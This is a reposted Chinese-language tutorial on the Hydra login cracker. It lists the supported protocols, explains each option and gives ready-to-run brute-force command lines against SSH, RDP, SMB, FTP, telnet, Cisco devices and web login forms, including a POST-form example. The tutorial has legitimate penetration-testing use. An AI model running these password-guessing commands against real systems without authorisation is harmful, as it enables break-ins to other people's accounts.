Hydra

    xiaoxiao2021-03-25  12

    Hydra

    Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

    Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.

    Currently this tool supports:  AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

    For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.

    This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

    The program is maintained by van Hauser and David Maciejak.

    The Hackers Choice 

    http://www.thc.org/thc-hydra

    参数详解:

    -R 根据上一次进度继续破解 -S 使用SSL协议连接 -s 指定端口 -l 指定用户名 -L 指定用户名字典(文件) -p 指定密码破解 -P 指定密码字典(文件) -e 空密码探测和指定用户密码探测(ns) -C 用户名可以用:分割(username:password)可以代替-l username -p password -o 输出文件 -t 指定多线程数量,默认为16个线程 -vV 显示详细过程 server 目标IP service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)

    案例:

    使用hydra破解ssh的密码

    hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

    破解https:

    hydra -m /index.php -l username -P pass.txt IP https

    破解teamspeak:

    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

    破解cisco:

    hydra -P pass.txt IP cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

    破解smb:

    hydra -l administrator -P pass.txt IP smb

    破解pop3:

    hydra -l muts -P pass.txt my.pop3.mail pop3

    破解rdp:

    hydra IP rdp -l administrator -P pass.txt -V

    破解http-proxy:

    hydra -l admin -P pass.txt http-proxy://10.36.16.18

    破解telnet:

    hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

    破解ftp:

    hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

    get方式提交,破解web登录:

    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php

    post方式提交,破解web登录:

    该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下: <form action="index.php" method="POST"> <input type="text" name="name" /><BR><br> <input type="password" name="pwd" /><br><br> <input type="submit" name="sub" value="提交"> </form> 假设有以上一个密码登录表单,我们执行命令: hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>” 说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。

    转载:http://www.2cto.com/article/201305/213232.html

    转载请注明原文地址: https://ju.6miu.com/read-156123.html

    最新回复(0)